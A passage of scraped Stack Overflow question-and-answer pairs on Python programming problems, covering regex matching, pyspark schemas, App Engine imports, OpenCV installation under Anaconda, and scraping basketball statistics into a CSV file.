[1, 2] = 1.0
[1, 3] = 0.5
[2, 3] = 2.5
`triple` returns a (source,target,d-attribute) triple which might come-in
useful in other places as well.
The sparse matrix is created with the `sparse(I,J,D,rows,cols)` constructor
where `I,J,D` are all same length vectors and for each index `i` for them, the
matrix had a `D[i]` value at position `I[i],J[i]`.
If a symmetric weight matrix is needed, use the following:
julia> M = M+M'
3x3 sparse matrix with 6 Float64 entries:
[2, 1] = 1.0
[3, 1] = 0.5
[1, 2] = 1.0
[3, 2] = 2.5
[1, 3] = 0.5
[2, 3] = 2.5
|
Python Regex Matching
Question: I am inputting a text file (Line)(all strings). I am trying to make card_type
to be true so it can enter the if statement, however, it never enters the IF
statement. The output that comes out from the print line is:
imm48-1gb-sfp/imm48-1gb-sfp
imm-2pac-fp3/imm-2pac-fp3
imm5-10gb-xfp/imm5-10gb-xfp
sfm4-12/sfm4-12
This is the code:
print str(card_type)
if card_type == re.match(r'(.*)/(.*)',line):
card_type = card_type.group(1)
Answer: [`re.match`](https://docs.python.org/2/library/re.html#re.match) will return a
[`MatchObject`](https://docs.python.org/2/library/re.html#re.MatchObject) if
there's a match or `None` if there wasn't. Following code will capture the
part before `/` character:
import re
line = 'imm48-1gb-sfp/imm48-1gb-sfp'
match = re.match(r'(.*?)/', line)
if match:
card_type = match.group(1)
print card_type
|
Compile python module imports
Question: I have a problem. I write a python script to make my work faster and now I
want to share it with my team.
I don't want them to mess with some imports that are missing in the basic
python installation. I know there is a way to compile python to exe, but I
wonder if I can compile the code and the imports without messing with py2exe.
Does python have a built-in solution for that?
I saw that python have pyc compile option. Does it compile the import modules
as well?
Thanks, Or
Answer: No I don't believe you have a built-in standalone compilation mode native to
Python. The pyc is a compiled code but not the kind you usually distribute as
an executable program (meaning you would still need the Python interpreter).
If you don't want to use py2exe or other similar packages I advise you to use
a portable version of Python with which you can distribute your software (see
for example [WinPython](http://winpython.github.io/)). The easiest way to
accomplish this is by giving the portable distribution together with your code
and perhaps a batch file (or similar, if you want to have a .exe alike
behavior).
NOTE: You can provide the pyc compile code of the libraries you are using and
putting them on the root of you software (or just stating where those imports
should happen) but I predict this will give you problems in the future due to
dependencies between different libraries. So, it's possible although I would
hardly considerate it a good solution for what it seems to me you are trying
to achieve.
|
Python inverted dictionaries
Question: I'm currently writing a function that takes a dictionary with immutable values
and returns an inverted dictionary. So far, my code is getting extremely
simple tests right, but it still has some kinks to work out
def dict_invert(d):
inv_map = {v: k for k, v in d.items()}
return inv_map
list1 = [1,2,3,4,5,6,7,8]
list2 = {[1]:3245,[2]:4356,[3]:6578}
d = {['a']:[],['b']:[]}
d['a'].append(list1)
d['b'].append(list2)
How do I fix my code so that it passes the test cases?
My only thoughts are to change list 2 to `[1:32, 2:43, 3:54, 4:65]`; however,
I would still have a problem with having the `"[]"` in the right spot. I have
no idea how to do that.
Answer: The trick is to realize that multiple keys can have the same values, so when
inverting, you must make sure your values map to a list of keys.
from collections import defaultdict
def dict_invert(d):
inv_map = defaultdict(list)
for k, v in d.items():
inv_map[v].append(k)
return inv_map
**EDIT:**
Just adding a bit of more helpful info...
The `defaultdict(list)` makes the default value of the dict = `list()` when
accessed via `[]` or `get` (when normally it would raise `KeyError` or return
`None` respectively).
With that defaultdict in place, you can use a bit of logic to group keys
together... here's an example to illustrate (from my comment above)
Original dict: K0 -> V0, K1 -> V0, K2 -> V0
Should invert to: V0 -> [K0, K1, K2]
**EDIT 2:**
Your tests seem to be forcing you into using a normal dict, in which case...
def dict_invert(d):
inv_map = {}
for k, v in d.items():
if v not in inv_map:
inv_map[v] = []
inv_map[v].append(k)
return inv_map
|
Error with executing CGI script - writable directory for matplotlib
Question: I know that the similar problem was solving in this topic:
[Setting Matplotlib MPLCONFIGDIR: consider setting MPLCONFIGDIR to a writable
directory for matplotlib configuration
data](http://stackoverflow.com/questions/9827377/setting-matplotlib-
mplconfigdir-consider-setting-mplconfigdir-to-a-writable-dir)
, but I have problem with executing CGI script. I use HTML fomular to input
some data, and based on these data make OLS model by statsmodels and result
want print as HTML page. If I execute python script it give me this error:
<http://textuploader.com/5nrhf>
Basicaly I get error - `Failed to create /var/www/.matplotlib; consider
setting MPLCONFIGDIR to a writable directory for matplotlib configuration
data`
I red about setting the MPLCONFIGDIR in code before you import matplotlib and
ake sure the directory has permissions such that it can be written to by the
app like this:
import os
os.environ['MPLCONFIGDIR'] = "/home/lab/website/graph"
import matplotlib
or
import os
import tempfile
os.environ['MPLCONFIGDIR'] =tempfile.mkdtemp()
import matplotlib
but I don´t import matplotlib module in my script, only
`CGI`,`statsmodels.api`,`MySQLdb` and `numpy`
If you want, here is my CGI script - <http://textuploader.com/5nrx4>
I don´t know, if I must set permissions for matplotlib folder, to can be
writable by me as executro of CGI script or somehow set matplotlib folder to
different path (writable by me). BTW I dont own server it is just school
server.
Answer: You don't explicitly import `matplotlib`, but `statsmodels.api` imports
`pandas`, and in turn `pandas` imports `matplotlib` (you can see all tht
reading through your traceback).
So, you still need to have a writable `MPLCONFIGDIR` in order to run your
script. You already have the answer how to do that, but in case you want to
read more about it, there is some documentation
[here](http://matplotlib.org/faq/environment_variables_faq.html#envvar-
MPLCONFIGDIR) about setting `matplotlib` environment variables.
* * *
It should be enough to just add this in your file before you import
`statsmodels.api`:
import os
os.environ['MPLCONFIGDIR'] = "/home/lab/website/graph"
|
Appending the byte representation of a float to a python bytearray
Question: I am using python with ctypes to read an array of bytes and store this in a
python bytearray. This array is then transmitted as a UDP packet.
I would like to append the time to this array of bytes, and believe the way to
do this is to do:
t = time.time()
Which returns a python float. Then find the location this is stored in memory,
and extract the array of bytes (either 4 or 8, I'm not sure) which represent
the float, and append these bytes to my existing bytearray.
Any suggestions for time-stamping a UDP packet made of a bytearray gratefully
received.
My minimal code is as follows:
class Host:
def __init__(self):
self.data = (ctypes.c_ubyte * 4112)()
self.data_p = ctypes.byref(self.data)
self.byte_data = bytearray(4120)
self.t = (ctypes.c_ubyte * 8)()
self.t_p = ctypes.byref(self.t)
self.t = time.time()
self.Data_UDP_IP = "127.0.0.1"
self.Data_UDP_PORT = 8992
self.DataSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def genBytearray(self)
<function that fills self.data with actual data>
data = ctypes.cast(self.data_p, ctypes.POINTER(ctypes.c_ubyte))
self.t = time.time()
t_cast = ctypes.cast(self.t_p, ctypes.POINTER(ctypes.c_ubyte))
self.byte_data[0:4112] = data[0:4112]
self.byte_data[4112:4120] = t_cast[0:8]
import time
import ctypes
import socket
Host1 = Host()
genBytearray(Host1)
Host1.DataSock.sendto(self.byte_data, (self.Data_UDP_IP, self.Data_UDP_PORT))
Problem is, it seems t_cast is always equal to 0. I think by calling:
self.t = time.time()
I am not actually writing the time to the location pointed to by self.t_p.
Been stuck on this for a while and can't help but think there's an easier way.
I have come across struct.pack, but python seems to crash when I try to use
it.
Answer: In case anyone stumbles across this:
t = (ctypes.c_double * 1)(time.time())
tnew = ctypes.cast(t, ctypes.POINTER((ctypes.c_uint8 * 8)))
tnew.contents[0:8]
Extracts the uint8 representations of the 64 bit double returned by
time.time().
|
How to more efficiently search through an acoustid database with over 30 million rows?
Question: I'm currently playing around with an open source music recognition project
called acoustid. I've imported a table with over 30 million rows(300gb of
data) but it takes A TON of time to simply SELECT these rows. Currently,
selecting 200,000 rows can take 30 seconds.
The project offers acoustid-index to index the rows by only looking up the
first 15 seconds of a fingerprint and storing this on the hdd... which is then
loaded into ram. <https://bitbucket.org/acoustid/acoustid-index/overview>
Only, I have no idea how to use this.The directions are confusing. It seems
this was created for PostgreSQL. I'm using MySQL and Python on the server I'm
working on. Can I still use this to index my db?
Any suggestions as to how I use this to index the rows in the database? Are
there any other ways I can make the search through this database more
efficient?
Answer: In MySQL you can use an index on a BLOB/TEXT by defining the length you want
to apply this on:
CREATE INDEX idx_nn_1 ON sometable(accoustic(500));
This would index the first 500 bytes as your fingerprint (ie: Not 15 seconds).
To get to 15 seconds, you could use a MD5SUM, add that as an extra column and
then query for the MD5SUM of that 15 seconds. Alternative you could just use a
MD5SUM over the complete song.
|
Google App Engine: ImportError: No module named appengine.ext
Question: I am trying to write a test for my GAE programme which uses the datastore.
Following [Google's
Documentation](https://cloud.google.com/appengine/docs/python/tools/localunittesting),
I see that I should be adding the path to my SDK into my PYTHONPATH. I did
this using:
import sys
sys.path.remove('/usr/local/lib/python2.7/dist-packages') # Has a 'google' module, which I want to be sure isn't interfering.
sys.path.insert(1,'/home/olly/google-cloud-sdk/platform/google_appengine')
sys.path.insert(1, '/home/olly/google-cloud-sdk/platform/google_appengine/lib/yaml/lib')
Then when the file is run:
Traceback (most recent call last):
File "myapp_tests.py", line 20, in <module>
from google.appengine.ext import ndb
ImportError: No module named appengine.ext
I have installed the SDK in the location above, and looking in
`/home/olly/google-cloud-sdk/platform/google_appengine/` I found the `google`
folder, which has an `__init__.py` in it, along with `appengine`. Basically,
the folder structure looks good to me, with them all being named correctly and
having `__init__.py` files.
In an interactive console, after running the commands above, I found that I
could run:
import google
no problem, but when I tried
import google.appengine
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
ImportError: No module named appengine
It was my understanding that having the `__init__.py()` files in the
directories meant that they could be imported as above. I also did a `sudo
find / --name "google"`, and the only thing that showed up that is also in my
PYTHONPATH was the `/usr/local/lib/python2.7/dist-packages`, which I
explicitly removed, and also inserted the rest of my paths in front of anyway.
I tried using GAE's own method of:
import dev_appserver
dev_appserver.fix_sys_path()
which added a whole lot of paths to sys.path, but still didn't help me make it
work.
I also found that when I add `'/home/olly/Servers/google_appengine/google'` to
my paths, I can run:
import appengine.ext
but running:
from appengine.ext import ndb
causes:
Traceback (most recent call last):
File "booking_function_tests.py", line 16, in <module>
from appengine.ext import ndb
File "/home/olly/Servers/google_appengine/google/appengine/ext/ndb/__init__.py", line 7, in <module>
from tasklets import *
File "/home/olly/Servers/google_appengine/google/appengine/ext/ndb/tasklets.py", line 69, in <module>
from .google_imports import apiproxy_stub_map
File "/home/olly/Servers/google_appengine/google/appengine/ext/ndb/google_imports.py" , line 11, in <module>
from google3.storage.onestore.v3 import entity_pb
ImportError: No module named google3.storage.onestore.v3
Am I missing something really obvious? How should I go about importing ndb?
EDIT: I'm running the latest SDK (1.9.34), but I have the following code in my
google_imports.py:
try:
from google.appengine.datastore import entity_pb
normal_environment = True
except ImportError:
try:
from google3.storage.onestore.v3 import entity_pb
normal_environment = False
except ImportError:
# If we are running locally but outside the context of App Engine.
try:
set_appengine_imports()
from google.appengine.datastore import entity_pb
normal_environment = True
except ImportError:
raise ImportError('Unable to find the App Engine SDK. '
'Did you remember to set the "GAE" environment '
'variable to be the path to the App Engine SDK?')
Also, `google.__path__` gives me the `'/usr/local/lib/python2.7/dist-
packages'` path which I thought I removed earlier. Here is an excerpt of how
I'm removing it:
import sys
sys.path.insert(1, '/home/olly/Servers/google_appengine')
sys.path.insert(1, '/home/olly/Servers/google_appengine/lib/yaml/lib')
sys.path.remove('/usr/local/lib/python2.7/dist-packages')
import google
print google.__path__
print sys.path
['/usr/local/lib/python2.7/dist-packages/google']
['/home/olly/Servers/google_appengine/myapp', '/home/olly/Servers/google_appengine/lib/yaml/lib', '/home/olly/Servers/google_appengine/google', '/home/olly/Servers/google_appengine', '/usr/lib/python2.7', '/usr/lib/python2.7/plat-x86_64-linux-gnu', '/usr/lib/python2.7/lib-tk', '/usr/lib/python2.7/lib-old', '/usr/lib/python2.7/lib-dynload', '/usr/lib/python2.7/dist-packages', '/usr/lib/python2.7/dist-packages/PILcompat', '/usr/lib/python2.7/dist-packages/gtk-2.0', '/usr/lib/pymodules/python2.7', '/usr/lib/python2.7/dist-packages/ubuntu-sso-client', '/usr/lib/python2.7/dist-packages/wx-2.8-gtk2-unicode']
So my sys.path is updated, but `import google` seems to still be importing
from the no-longer-there path, which would be the crux of my problem I guess.
Do I need to reload the path or something?
Answer: I run into these problems a lot less by always running inside a
[virtualenv](https://virtualenv.readthedocs.org/en/latest/).
I agree with snakecharmerrb you should get print `google.__file__` or
`google.__path_` to figure out exactly what you're importing.
This snippet might also solve your problem:
import google
gae_dir = google.__path__.append('/path/to/appengine_sdk//google_appengine/google')
sys.path.insert(0, gae_dir) # might not be necessary
import google.appengine # now it's on your import path`
|
How do I resolve debug/release conflict after installing opencv under anaconda
Question: Tried to get started with OpenCV under Python today, although I have no
experience with the former and very little experience with the latter. Since I
am inexperienced, I followed a canned approach for the install, as detailed
below. Now I am trying to figure out if I need to install from source.
Started by downloading and installing Anaconda with Python 2.7.
Downloaded opencv 3.1.0 for Windows and moved the cv2.pyd file into
C:\Anaconda2\Lib\site-packages. I believe this means I installed a binary
rather than from source. Didn't tinker with any pathnames or environmental
variables at this point.
Used Anaconda Launcher to start Spyder. import cv2 ran in the Spyder console
without complaint. print cv2.**version** returned 3.1.0, which I interpreted
as a successful install.
Trouble began when I tried to do something. cv2.imread is returning a None
value. The obvious explanation for this is that I am supplying the wrong
filename but I don't think that's it. I ran os.listdir('.') and then
cv2.imread() to eliminate this possibility. The more sinister explanation is
that I have mixed Debug and Release libraries (see this thread [OpenCV
imread(filename) fails in debug mode when using release
libraries](http://stackoverflow.com/questions/9125817/opencv-imreadfilename-
fails-in-debug-mode-when-using-release-libraries)).
My question is: how do I check if a release / debug conflict is indeed causing
the problem? I see some advice that references changing CMake parameters and
rebuilding but since I just dropped a binary into a folder, that doesn't
really relate to how I installed OpenCV. This brings me back to the question I
started with: do I need to abandon the binary and reinstall from the source?
That is a daunting prospect for me. I ran cv2.getBuildInformation() and it
dumped a bunch of text on my console but I couldn't figure out what it meant.
It seemed to reference both Release and Debug modes.
EDIT: I'm running 64 bit Windows 7 Pro
John
Answer: You might want to install OpenCV via [conda
packages](http://conda.pydata.org/docs/) which downloads the binaries and does
all the configuration for you. Open a command window (cmd.exe) and type:
conda update conda
conda install --channel https://conda.anaconda.org/menpo opencv
BUT, since you are starting I would recommend you to use Python 3. If you
prefer not to do a fresh installation, you can create a conda environment with
python 3.4 which runs independently and will not mesh up any of your
installations:
conda create -n OpenCVenv python=3.4
To activate this environment you will need to run the following command every
time you want to use opencv or install new packages
activate OpenCVenv
Once you have activated the environment you can install opencv3:
conda install --channel https://conda.anaconda.org/menpo opencv3
Notice that if you want to install the different packages such as Spyder you
can do so:
conda install spyder
That's because Spyder is supported within Anaconda. For example you can
install all the [packages included en
Anaconda](https://docs.continuum.io/anaconda/pkg-docs)
conda install anaconda
|
BeautifulSoup not reading entire HTML obtained by requests
Question: I am trying to scrape data from a table of sporting statistics presented as
HTML using the BeautifulSoup and requests libraries. I am running both of them
on Python 3.5. I seem to be successfully obtaining the HTML via requests
because when I display `r.content`, the full HTML of the website I am trying
to scrape is displayed. However, when I pass this to BeautifulSoup,
BeautifulSoup drops the bulk of the HTML which are the tables of statistics
themselves.
If you take a look at the
[website](http://afltables.com/afl/stats/games/2015/031420150402.html) in
question, the HTML from "Scoring Progression" onward is dropped.
I think the problem relates to the pieces of HTML which are included between
brackets ('[' and ']') but I have not been able to develop a workaround. I
have tried the html, lxml and html5lib parsers for BeautifulSoup, to no avail.
I have also tried providing 'User-Agent' headers and that did not work either.
My code is as below. For brevity's sake I have not included the output.
import requests
from bs4 import BeautifulSoup
r = requests.get('http://afltables.com/afl/stats/games/2015/031420150402.html')
soup = BeautifulSoup(r.content, 'html5lib')
print(soup)
Answer: I used a different parser and it seemed to work; just the default html parser.
from bs4 import BeautifulSoup
from urllib.request import urlopen as uReq
url = 'http://afltables.com/afl/stats/games/2015/031420150402.html'
client = uReq(url) # grabs the page
soup = BeautifulSoup(client.read(), 'html.parser') # using the default html parser
tables = soup.find_all('table') # gets all the tables
print(tables[7]) # scoring progression table, the 8th's table
Though if you had tried something like "soup.table" without having used
"find_all" clause first, it would seem like it dropped the other tables since
it only returns the first table.
|
Building a StructType from a dataframe in pyspark
Question: I am new spark and python and facing this difficulty of building a schema from
a metadata file that can be applied to my data file. Scenario: Metadata File
for the Data file(csv format), contains the columns and their types: for
example:
id,int,10,"","",id,"","",TRUE,"",0
created_at,timestamp,"","","",created_at,"","",FALSE,"",0
I have successfully converted this to a dataframe that looks like:
+--------------------+---------------+
| name| type|
+--------------------+---------------+
| id| IntegerType()|
| created_at|TimestampType()|
| updated_at| StringType()|
But when I try to convert this to a StructField format using this
fields = schemaLoansNew.map(lambda l:([StructField(l.name, l.type, 'true')]))
OR
schemaList = schemaLoansNew.map(lambda l: ("StructField(" + l.name + "," + l.type + ",true)")).collect()
And then later convert it to StructType, using
schemaFinal = StructType(schemaList)
I get the following error:
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/opt/mapr/spark/spark-1.4.1/python/pyspark/sql/types.py", line 372, in __init__
assert all(isinstance(f, DataType) for f in fields), "fields should be a list of DataType"
AssertionError: fields should be a list of DataType
I am stuck on this due to my lack of knowledge on Data Frames, can you please
advise, how to proceed on this. once I have schema ready I want to use
createDataFrame to apply to my data File. This process has to be done for many
tables so I do not want to hardcode the types rather use the metadata file to
build the schema and then apply to the RDD.
Thanks in advance.
Answer: Fields have argument have to be a list of `DataType` objects. This:
.map(lambda l:([StructField(l.name, l.type, 'true')]))
generates after `collect` a `list` of `lists` of `tuples` (`Rows`) of
`DataType` (`list[list[tuple[DataType]]]`) not to mention that `nullable`
argument should be boolean not a string.
Your second attempt:
.map(lambda l: ("StructField(" + l.name + "," + l.type + ",true)")).
generates after `collect` a `list` of `str` objects.
Correct schema for the record you've shown should look more or less like this:
from pyspark.sql.types import *
StructType([
StructField("id", IntegerType(), True),
StructField("created_at", TimestampType(), True),
StructField("updated_at", StringType(), True)
])
Although using distributed data structures for task like this is a serious
overkill, not to mention inefficient, you can try to adjust your first
solution as follows:
StructType([
StructField(name, eval(type), True) for (name, type) in df.rdd.collect()
])
but it is not particularly safe (`eval`). It could be easier to build a schema
from JSON / dictionary. Assuming you have function which maps from type
description to canonical type name:
def get_type_name(s: str) -> str:
"""
>>> get_type_name("int")
'integer'
"""
_map = {
'int': IntegerType().typeName(),
'timestamp': TimestampType().typeName(),
# ...
}
return _map.get(s, StringType().typeName())
You can build dictionary of following shape:
schema_dict = {'fields': [
{'metadata': {}, 'name': 'id', 'nullable': True, 'type': 'integer'},
{'metadata': {}, 'name': 'created_at', 'nullable': True, 'type': 'timestamp'}
], 'type': 'struct'}
and feed it to `StructType.fromJson`:
StructType.fromJson(schema_dict)
|
python3 interpreter gives different results than script for scipy.misc.imread
Question: I am trying to read image data into Python as a matrix.
To this extent, I am trying to use
`scipy.misc.imread('image.jpg').astype(np.float)`.
When I execute the proper sequence of steps from a `python3` interpreter,
everything works swimmingly, and I get a matrix as expected.
When I invoke the command from a script (`python3 foo.py`...), however, I get
an error complaining that the argument to convert via `float` cannot be of
type `JpegImageFile`. I've ensured that I've `pip install -U pillow` to ensure
that PIL is available.
What gives? How could this be possible? I've verified over and over that the
same lines of code are executed in each case, the only difference seems to be
that the invocation inside of a script happens inside of a defined function,
but even if I `pdb.set_trace()` from elsewhere in the script the same results
happen.
What could be causing fluctuation in results from the interpreter to the
script?
**EDIT** : OK, to be precise, I am running the `neural_style.py` script from
here: <https://github.com/anishathalye/neural-style> . `scipy`, `numpy`,
`tensorflow`, and `pillow` must be installed. I am using `python3`. Any
parameters for `--content`, `--styles`, and `--output` should work to dupe the
bug.
Full error traceback:
Traceback (most recent call last):
File "neural_style.py", line 150, in <module>
main()
File "neural_style.py", line 84, in main
content_image = imread(options.content)
File "neural_style.py", line 141, in imread
return scipy.misc.imread(path).astype(np.float)
TypeError: float() argument must be a string or a number, not 'JpegImageFile'
But, a small simple script such as the following actually works:
import numpy as np
import scipy.misc
print(scipy.misc.imread('content').astype(np.float))
Answer: I figured out the solution to this. The `neural_style.py` script seems to be
getting a different version of `scipy` module (or submodule) due to a side
effect of importing `stylize.py` and, in turn, `vgg.py`. Adding this line:
import scipy.misc
To the very top of `stylize.py` (in front of `import vgg`) fixes it.
I'm really not sure why, though.
|
Python iteration over non-sequence in an array with one value
Question: I am writing a code to return the coordinates of a point in a list of points.
The list of points class is defined as follows:
class Streamline:
## Constructor
# @param ID Streamline ID
# @param Points list of points in a streamline
def __init__ ( self, ID, points):
self.__ID = ID
self.__points = points
## Get all Point coordinates
# @return Matrix of Point coordinates
def get_point_coordinates ( self ):
return np.array([point.get_coordinate() for point in self.__points])
With
class Point:
## Constructor
# @param ID Streamline ID
# @param cor List of Coordinates
# @param vel List of velocity vectors (2D)
def __init__ ( self, ID, coord, veloc):
self.__ID = ID
self.set_coordinate( coord )
self.set_velocity( veloc )
The thing is that I start my code by defining a Streamline with one Point in
the point list. A little down the road I call the function
get_point_coordinates and the iteration over the list of points raises the
following error:
return np.array([point.get_coordinate() for point in self.__points])
TypeError: iteration over non-sequence
I need to find a way to bypass this error and neatly return just a 1x2 matrix
with the point coordinates.
I've had a look at [this
question](http://stackoverflow.com/questions/11871593/python-iteration-over-
non-sequence) but it wasn't very helpful.
Answer: 1. Either call the Streamline-constructor with a sequence instead of a single point: `sl = Streamline(ID, [first_point])`
2. Or ensure the constructor makes the single point to be iterable:
class Streamline:
def __init__ ( self, ID, first_point):
self.__ID = ID
self.__points = [first_point]
3. It is a bad idea to write the constructor to accept a single point (`Streamline(ID, point1)`) and a sequence of points (`Streamline(ID, [point1, point2, ...])`). If you want so, you can do
from collections import Iterable
class Streamline:
def __init__ ( self, ID, first_point):
self.__ID = ID
self.__points = points if isinstance(points, Iterable) else [points]
4. Better than 3. would be to unpack the points given in arguments via `*` to enable `Streamline(ID, point1)` and `Streamline(ID, point1, point2, ...)`.
class Streamline:
def __init__ ( self, ID, *points):
self.__ID = ID
self.__points = points
|
Install BeautifulSoup on python3.5, Mac , ImportError:No module named 'bs4'
Question: I want to install BeautifulSoup, I use python3.5 on Mac
I have tried many methods:
I try to download `beautifulsoup4-4.4.1.tar.gz` from official website,and in
terminal type:
> $ cd [my path]
>
> $ sudo python3.5 ./setup.py install
I also tried:
> $ sudo pip3 install beautifulsoup4
and the terminal says:
> Requirement already satisfied (use --upgrade to upgrade): beautifulsoup4 in
> /Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/site-
> packages/beautifulsoup4-4.4.1-py3.5.egg
So I think it is already installed, but when In python3 I type (I use pycharm)
> from bs4 import BeautifulSoup
It says
> Traceback (most recent call last): File "", line 1, in File
> "/Applications/PyCharm Edu.app/Contents/helpers/pydev/pydev_import_hook.py",
> line 21, in do_import module = self._system_import(name, *args, **kwargs)
> ImportError: No module named 'bs4'
Did I install bs4 properly? How can I import bs4 into python3?
Answer: I have solved this porblem!
just as @Martjin Pieters said,PyCharm can install packages by Menu Operation:
PyCharm -> Preference -> Project -> Project interpreter
Check if you are using python3 and click "+" at the bottom (If you see
BeatifulSoup in the frame, click "-" to uninstall it first) then you can
install it properly
[see this picture](http://i.stack.imgur.com/UXLYt.png)
|
Adding new line to data for csv in python
Question: I'm trying to scrape data from
<http://www.hoopsstats.com/basketball/fantasy/nba/opponentstats/16/12/eff/1-1>
to create a CSV file using Python 3.5. I've figured out how to do so, but all
the data is in the same row when I open the file in excel.
import sys
import requests
from bs4 import BeautifulSoup
import csv
r = requests.get('http://www.hoopsstats.com/basketball/fantasy/nba/opponentstats/16/12/eff/1-1')
soup = BeautifulSoup(r.text, "html.parser")
stats = soup.find_all('table', 'statscontent')
pgFile = open ('C:\\Users\\James\\Documents\\testpoop.csv', 'w')
for table in soup.find_all('table', 'statscontent','a'):
stats = [ stat.text for stat in table.find_all('center') ]
team = [team for team in table.find('a')]
p = (team,stats)
z = str(p)
a = z.replace("]",'')
b = a.replace("'", "")
c = b.replace(")", "") #Only way I knew how to clean up extra characters
d = c.replace("(", "")
e = d.replace("[", "")
print(e) #printing while testing
pgFile.writelines(e)
pgFile.close()
The data comes out nice in the python shell:
Boston, 1, 67, 47.9, 19.6, 5.2, 7.2, 1.8, 0.5, 4.3, 4.1, 4.3, 0.9, 6.8-16.1, .421, 1.6-4.9, .324, 4.4-5.4, .816, 19.7, -6.8
San Antonio, 2, 67, 47.8, 19.7, 5.0, 8.7, 1.9, 0.3, 3.5, 3.3, 4.2, 0.8, 7.4-18.0, .411, 1.5-4.6, .317, 3.4-4.2, .819, 20.7, -2.4
Atlanta, 3, 67, 48.7, 19.2, 5.6, 8.4, 2.3, 0.6, 4.1, 3.7, 4.6, 1.0, 7.1-17.6, .401, 2.0-5.8, .338, 3.2-3.8, .828, 20.8, -5.6
Miami, 4, 67, 49.8, 20.6, 5.2, 8.0, 1.9, 0.3, 3.2, 3.6, 4.3, 0.9, 7.6-18.5, .407, 1.9-5.3, .348, 3.7-4.5, .814, 21.0, 2.1
L.A.Clippers, 5, 66, 48.2, 21.0, 5.7, 8.7, 1.9, 0.2, 4.1, 4.5, 4.6, 1.1, 7.6-18.7, .405, 1.9-5.4, .346, 3.9-4.9, .799, 21.1, -7.0
Toronto, 6, 66, 48.0, 20.5, 5.3, 8.8, 1.7, 0.6, 3.8, 3.7, 4.4, 0.9, 7.4-18.0, .412, 2.1-5.9, .349, 3.6-4.4, .826, 21.6, -4.3
Charlotte, 7, 66, 48.1, 19.3, 6.0, 9.1, 1.6, 0.6, 3.4, 4.1, 5.1, 0.9, 7.1-17.8, .399, 2.0-6.4, .321, 3.0-3.7, .802, 21.7, -4.5
Milwaukee, 8, 68, 48.8, 19.3, 5.4, 9.1, 1.9, 0.3, 4.2, 3.5, 4.6, 0.8, 6.8-15.9, .425, 1.9-6.0, .311, 3.9-5.0, .788, 21.7, 2.1
Utah, 9, 67, 49.3, 21.9, 5.5, 8.1, 2.3, 0.4, 3.7, 3.4, 4.5, 1.0, 7.8-18.3, .424, 2.2-5.7, .382, 4.1-5.3, .787, 22.7, 5.8
Memphis, 10, 67, 48.7, 22.4, 5.1, 8.3, 1.6, 0.4, 3.9, 4.1, 4.3, 0.8, 7.7-17.7, .434, 2.5-7.0, .358, 4.6-5.7, .813, 22.9, -2.0
Detroit, 11, 67, 49.1, 22.3, 5.8, 8.4, 1.6, 0.3, 3.7, 4.2, 4.9, 0.9, 8.4-19.1, .441, 2.0-5.5, .362, 3.5-4.4, .801, 23.2, -0.1
Minnesota, 12, 67, 47.1, 21.9, 5.3, 8.7, 2.0, 0.3, 3.6, 3.9, 4.3, 1.0, 8.1-18.7, .434, 2.2-6.5, .336, 3.5-4.2, .826, 23.3, -2.8
Portland, 13, 68, 47.8, 22.5, 5.1, 8.1, 1.8, 0.5, 3.1, 3.7, 4.1, 1.0, 8.2-18.8, .438, 2.1-5.7, .370, 4.0-5.1, .777, 23.3, -1.0
New York, 14, 68, 47.5, 21.2, 6.0, 8.5, 1.9, 0.2, 3.0, 2.6, 4.9, 1.1, 7.7-18.3, .419, 1.8-5.2, .342, 4.1-5.0, .819, 23.3, 6.4
Houston, 15, 67, 50.9, 21.3, 6.2, 9.8, 2.3, 0.3, 5.0, 4.3, 5.3, 0.9, 7.7-18.4, .417, 2.3-6.7, .351, 3.6-4.4, .809, 23.3, 6.1
Indiana, 16, 67, 49.3, 23.3, 5.9, 8.3, 1.8, 0.4, 4.6, 3.9, 5.0, 0.9, 8.3-18.8, .443, 2.3-5.8, .387, 4.3-5.3, .813, 23.7, 5.4
Chicago, 17, 65, 48.9, 22.2, 6.4, 8.6, 2.1, 0.6, 2.9, 2.8, 5.2, 1.2, 8.2-20.3, .407, 1.8-5.6, .323, 3.9-5.2, .764, 23.8, 4.7
Golden State, 18, 66, 49.3, 24.5, 5.1, 8.4, 2.4, 0.2, 3.7, 4.1, 4.0, 1.2, 9.1-21.3, .427, 2.3-6.6, .350, 4.0-5.0, .802, 23.8, -14.7
Dallas, 19, 67, 49.5, 22.1, 6.0, 8.3, 2.0, 0.4, 3.3, 4.0, 5.1, 0.9, 8.3-18.7, .440, 2.1-6.1, .347, 3.4-4.4, .778, 24.0, 2.0
Washington, 20, 66, 49.5, 23.8, 5.8, 8.2, 2.0, 0.3, 4.4, 3.9, 5.0, 0.9, 8.9-20.1, .444, 2.5-6.4, .398, 3.5-4.1, .851, 24.1, -4.6
Cleveland, 21, 66, 49.3, 22.9, 5.7, 9.1, 1.9, 0.3, 3.5, 3.3, 4.9, 0.8, 8.3-19.4, .428, 2.0-5.5, .360, 4.3-5.1, .837, 24.3, 1.0
Denver, 22, 68, 48.6, 21.8, 5.9, 8.8, 1.9, 0.5, 3.3, 3.8, 4.9, 1.0, 7.8-17.9, .436, 2.4-6.5, .369, 3.9-4.9, .783, 24.5, 5.8
Philadelphia, 23, 67, 48.6, 21.9, 6.0, 8.8, 2.3, 0.5, 4.1, 3.4, 5.0, 0.9, 8.0-17.8, .447, 1.7-4.7, .366, 4.2-5.0, .837, 24.7, 2.8
Oklahoma City, 24, 67, 48.1, 22.6, 6.1, 8.5, 2.1, 0.3, 3.1, 3.8, 5.0, 1.1, 8.2-18.7, .440, 2.4-5.9, .405, 3.8-5.0, .750, 24.8, -10.4
Orlando, 25, 66, 49.6, 22.9, 6.7, 9.2, 1.9, 0.6, 4.3, 3.5, 5.7, 1.0, 8.2-18.5, .444, 2.3-6.1, .385, 4.2-5.2, .794, 25.6, 5.7
Brooklyn, 26, 67, 48.5, 23.0, 5.5, 9.0, 2.4, 0.3, 3.5, 3.2, 4.5, 1.0, 8.6-18.6, .463, 2.6-6.6, .390, 3.3-4.3, .768, 25.8, 3.4
Sacramento, 27, 66, 49.7, 23.7, 5.9, 9.5, 2.3, 0.4, 4.0, 3.6, 4.8, 1.0, 8.6-19.8, .436, 2.6-7.5, .346, 3.9-4.7, .834, 25.9, -0.3
